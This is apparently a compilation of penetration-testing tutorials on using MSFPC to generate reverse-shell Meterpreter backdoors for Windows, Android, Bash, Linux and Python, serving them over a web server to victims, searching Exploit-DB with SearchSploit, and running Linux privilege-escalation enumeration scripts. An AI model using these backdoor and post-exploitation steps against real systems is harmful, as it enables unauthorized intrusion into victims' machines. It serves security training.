Comprehensive Guide to MSFPC

Hello Friends!!

As you all are aware of MSFvenom-A tool in Kali Linux for generating payload, is also available as MSFvenom Payload Creator (MSFPC) for generating various "basic" Meterpreter payloads via msfvenom. It is fully automating msfvenom & Metasploit is the end goal.

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on user’s choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Source: https://github.com/g0tmi1k/mpc

Author: g0tmi1k

SYNTAX

msfpc () () () () () () () ()

Create a Payload with Interactive IP Mode

Let’s create the payload for Windows platform with the help of following command

msfpc windows

When you will enter above command it will automatically confirm the interface:

Which interface should be used?

eth0, lo wan

We press 1 for eth0 and then it will start generating payload and as result give us following:

1.       Location of MSF handler file and windows meterpreter created.

2.       Command to be run to start multi handler automatically within metasploit framework.

3.       Command for file transfer through web server.

Basically the msfpc is design to reduce the user’s effort in generating payload of various platforms with different-different format of file. So when you will type “msfpc” it will display all types of platform and generate a specific format of file likewise.

Syntax: msfpc

Windows Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Windows, then all you need to do is type following:

msfpc windows 192.168.1.109 1234

If you will not mention IP, it will automatically ask to choose interface as discussed above and choose 443 as default lport. It creates a malicious backdoor in the .exe format for 32-bit architecture. Then it will start generating the payload and as result give us details following details.

·         Location of MSF handler file and windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'

·         command to be run to start multi handler automatically: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'

·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to download and run the .exe file that will provide meterpreter session to the attacker.

http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe

Conclusion: Earlier the attackers were using manual method to generate a payload via msfvenom command and then use Metasploit module “multi/handler” to access the reverse connection via meterpreter session and this technique was quite successfully approach to compromise a victim’s machine although took much time. But same approach is applicable with the help of MSFPC for generating various "basic" Meterpreter payloads via msfvenom.

Android Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Android, then all you need to do is type following:

msfpc apk 192.168.1.109 1234

It creates a malicious backdoor in the .apk format. Then it will start generating the payload and as result give us following details.

·         Location of MSF handler file and android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'

·         Command to be run to start multi handler automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'

·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and run the .apk file that will provide meterpreter session to the attacker.

http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk

Hence you can observe as said above, we have meterpreter session of target’s machine.

BASH

The pro above MSFPC is that it reduces the stress to remember the format for each platform, all we need to do is just follow the above declare syntax and the rest will be managed by MSFPC automatically. Suppose I want to create a payload for Bash platform, and then it will take a few minutes in MSFPC to generate a bash payload.

msfpc bash 192.168.1.109 1234

It creates a malicious backdoor in the .sh format. Then it will start generating the payload and as result give us following:

·         Location of MSF handler file and bash meterpreter created: '/root/bash-shell-staged-reverse-tcp-1234.sh.'

·         Command to be run to start multi handler automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'

·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the bash script with full permission, it will give command shell.  

http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh

chmod 777 bash-shell-staged-reverse-tcp-1234.sh

./bash-shell-staged-reverse-tcp-1234.sh

Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.

sessions -u 1

Linux

If you want to generate a payload to get meterpreter session victim’s machine which operates on Linux, then all you need to do is type following:

msfpc linux 192.168.1.109 4444

It creates a malicious backdoor in the .elf format. Then it will start generating the payload and as result give us following details:

·         Location of MSF handler file and Linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf

·         Command to be run to start multi handler automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'

·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and once the target run the .elf file with full permission, it will give command shell. 

http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf

chmod 777 linux-shell-staged-reverse-tcp-4444.elf

./linux-shell-staged-reverse-tcp-4444.elf

Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.

sessions -u 1

Python

If you want to generate a payload to get meterpreter session victim’s machine which operates on Python, then all you need to do is type following:

msfpc python 192.168.1.109 5555

It creates a malicious backdoor in the .py format. Then it will start generating the payload and as result give us following detaisl:

Location of MSF handler file and python meterpreter created: '/root/python-meterpreter-staged-reverse_tcp-5555.py

Command to be run to start multi handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the python script, it will give meterpreter session. 

http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py

python python-meterpreter-staged-reverse_tcp-5555.py

Hence you can observe as said above, we have meterpreter session of target’s machine

Batch (Generates all Possible Combination Payloads)

 Batch is most significant Mode as it generate as much as possible combination of payload. If we want to create all payloads which can give meterpreter session then we can use the following command in that situation.

msfpc msf batch eth0

In the given below command you can observe here it has generated all possible types payload which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.

If we want to create all payloads which can give command shell session of the target’s machine then we can use the following command in that situation.

msfpc cmd batch eth0

In the given below command you can observe here it has generated all possible types payload which can give command shell.

Loop (Generates One payload for Each Platform)

Loop is also most significant mode as it generates on of each type of payload with their default values. Hence by default will generate a payload to provide meterpreter session rather than command shell session.

msfpc verbose loop eth0

In the given below command you can observe here it has generated all possible types payload for each platform which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.

Generating Stageless Payload

As we all know there are two types of payloads i.e. stag and stageless and by default it creates a stage payload. If you want to create a stageless payload then you can go with the following command to generate stageless payload for command shell session or meterpreter session.

msfpc stagless cmd window 192.168.1.109 

msfpc stagless msf  window 192.168.1.109 

The rest technique is as above to execute the payload and get reverse connection.

Compreihensive Guide on SerachSploit

Hello friends!! Several times you might have read our articles on CTF challenges and other, where we have used searchsploit to find out an exploit if available in its Database. Today in this article we are going to discuss SerachSploit in detail.

Table of Content

Introduction to serachsploit

Title Searching

Advance Title Searching

Copy To Clipboard

Copy To Directory

Examine an Exploit

Examining Nmap result

Exploit-DB Online

Eliminate Unwanted Results

Case Sensitive

Introduction to SerachSploit

Included in the Exploit Database repository on GitHub is “searchsploit”, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.

Since we are using GNOME build of Kali Linux therefore the “exploitdb” package is already included by default, all we need to do, open the terminal and just type “searchsploit” and press Enter. You will welcome by its help screen.

Searchsploit options

-c --case               [Term]                  carry out a case-sensitive search

 -e --exact           [Term]                  carry out an EXACT match on exploit title [Implies "-t"].

 -j --json               [Term]                  give result in JSON format.

 -m --mirror        [EDB-ID]               Mirror (aka copies) an exploit to the current working directory.

 -o --overflow    [Term]                  Exploit titles are allowed to overflow their columns.

 -p, --path            [EDB-ID]               Show the full path to an exploit.

 -t --title               [Term]                  Search JUST the exploit title.

 -u --update                                        Check for and install any exploitdb package updates.

 -w --www          [Term]                  Show URLs to Exploit-DB.com rather than the local path.

 -x --examine     [EDB-ID]               Examine the exploit using $PAGER.

 --colour                               Disable color highlighting in search results.

 --id                                                        Display the EDB-ID value rather than local path.

 --nmap                                                [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)

Use "-v" (verbose) to try even more combinations

--exclude="term"       Remove values from results.

e.g. --exclude="term1|term2|term3".

Source: https://www.exploit-db.com/searchsploit/

Title Searching

Using –t option enables “title” parameter to search an exploit with specific title. Because by default, searchsploit will try both the title of the exploit as well as the path. Searching an exploit with specific title gives quick and sorted results. 

Advance Title Searching

Even you can use –t option, to get more fine result in finding the exploit of any particular platform. For example, if you want to find out java exploit for windows platform, then you can consider the following command.

searchsploit –t java windows

Now you can compare the current output result from the previous result.

Copy to Clipboard

Using –p options, enables “copy to clipboard parameter” as this option provides more information related to the exploit, as well as copy the whole path to the exploit to the clipboard, all you need press Ctrlv to paste.

searchsploit 39166

searchsploit -p 39166

In the following image we have shown the default result varies when we use –p option along it.

Copy to Directory

using –m options, enables “copy to directory/folder parameter” as this option provides same information as above related to the exploit, as well as copy the exploit in your current working directory.

searchsploit 39166

searchsploit -m 39166

In the following image we have shown the default result varies when we use –m option along it.

Examine an Exploit

Using –examine option, enables examine parameter to read the functionality of that exploit with the help of $PAGER.

searchsploit 39166 –examine

The above command will open the text file of the exploit to review its functionality, code and other information.

Examining Nmap result

As we all known, Nmap has very remarkable feature that let you save its output result in .xml format and we can identify each exploit associated with nmap xml file.

 

nmap –sv 192.168.1.102 –oX result.xml

With the help of above command we have saved the scanning result of nmap in an xml file, so that we can search the exploit related to scanned port/services.

Using –x option enables the examine parameter as well as  --nmap option Checks all results in Nmap's XML output with service version to find out related exploit with it.

searchsploit –x --nmap result.xml

Here you can observe that, it is using verbose mode for examine xml file and had shown all possible exploit of running services.

Continue reading…

Exploit-DB Online

Using –w option, enables website URL because on its website you will get more detailed information such CVE-ID, setup files, tags, and vulnerability mappings which is not included in searchsploit.

searchsploit ubuntu 14.04 –w

The above command will show all available Exploit DB website links for the exploit related to ubuntu 14.04.

Eliminate Unwanted Results
using –exclude option, it enables exclude parameter to remove unwanted result from inside the list of exploit. You can also remove multiple terms by separating the terms with a “|” (pipe). This can be considered in the following:

serachploit ubuntu 14.04

searchploit –exclude=”Privilege Escalation”

In the following image we have shown the default result varies when we use --exclude option along it. Even you can eliminate more terms with the help of “|” (pipe)

searchsploit –exclude=”Privilege Escalation” | (Poc)

Moreover we can use the universal Grep command to remove unwanted result from its output result. This can be considered in the following:

serachploit ubuntu14.04

searchploit ubuntu 14.04 | grep “Buffer Overflow”

The above command will only look for all available exploit of ubuntu 14.04 on Buffer Overflow and dump the result.

Case Sensitive

Using –c option, enables the “case-sensitive search” parameter to find out exploit related to specific character mention in the command, by default it makes insensitive search. You can consider the following example:

serachsploit xss

serachsploit –c XSS

As you can observe by default it has show all available exploit related to xss/XSS but in the next command it has shown the result only for XSS.

Linux Privilege Escalation via Automated Script

We all know that, after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to higher-privileged shell. But apart from it, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Table of Content

·         Introduction

·         Vectors of Privilege Escalation

·         LinuEnum

·         Linuxprivchecker

·         Linux Exploit Suggester 2

·         Bashark

·         BeRoot

Introduction

Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he try to gather critical information related to system such as hidden password and weak configured services or applications and etc. All these information helps the attacker to make the post exploit against machine for getting higher-privileged shell.

Vectors of Privilege Escalation

§  OS Detail & Kernel Version

§  Any Vulnerable package installed or running

§  Files and Folders with Full Control or Modify Access

§  File with SUID Permissions  

§  Mapped Drives (NFS)

§  Potentially Interesting Files

§  Environment Variable Path

§  Network Information (interfaces, arp, netstat)

§  Running Processes

§  Cronjobs

§  User’s Sudo Right

§  Wildcard Injection

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.

LinuEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it through github with help of following command:

git clone https://github.com/rebootuser/LinEnum.git

Once you download this script, you can simply run it by tying ./LinEnum.sh on terminal. Hence it will dump all fetched data and system details.

Let’s Analysis Its result what is brings to us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which comes under the Post exploitation.

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. Use wget to download the script from its source URL.

wget http://www.securitysift.com/download/linuxprivchecker.py

Now to use this script just type python linuxprivchecke.py on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

python linuxprivchecker.py

Let’s Analysis Its result what is brings to us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/asroot.sh which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a 'uname -r' to grab the Linux operating system release version, and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

·         More exploits

·         Accurate wildcard matching. This expands the scope of searchable exploits.

·         Output colorization for easy viewing.

·         And more to come

git clone https://github.com/jondonas/linux-exploit-suggester-2.git

cd linux-exploit-suggester-2

You can use the '-k' flag to manually enter a wildcard for the kernel/operating system release version.

./linux-exploit-suggester-2.pl -k 3.5

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

·         Single Bash script

·         Lightweight and fast

·         Multi-platform: Unix, OSX, Solaris etc.

·         No external dependencies

·         Immune to heuristic and behavioural analysis

·         Built-in aliases of often used shell commands

·         Extends system shell with post-exploitation oriented functionalities

·         Stealthy, with custom cleanup routine activated on exit

·         Easily extensible (add new commands by creating Bash functions)

·         Full tab completion

Execute following command to download it from the github:

git clone https://github.com/TheSecondSun/Bashark.git

cd Bashark

To execute the script you need to run following command:

source bashark.sh

help

The help command will let you know all available options provide by bashark for post exploitation.

With help of portscan option you can scan the internal network of the compromised machine.

To fetch all configuration file you can use getconf option. It will pull out all configuration file stored inside /etc directory. Similarly you can use getprem option to view all binaries files of the target‘s machine.

portscan < target’s IP>

getconf

getprem

BeRoot

BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that have been found as potential way to escalate our privilege.

git clone https://github.com/AlessandroZ/BeRoot.git

cd Linux

chmod 777 beroot.py

To execute the script you need to run following command:

./beroot.py

It will try to enumerate all possible loopholes which can lead to privilege Escalation, as you can observe the highlighted yellow color text represents weak configuration that can lead to root privilege escalation whereas the red color represent the technique that can be used to exploit.

It’s Functions:

Check Files Permissions

SUID bin

NFS root Squashing

Docker

Sudo rules

Kernel Exploit

Conclusion: Above executed script are available on github, you can easily download it from github. These all automated script try to identify the weak configuration that can lead to root privilege escalation.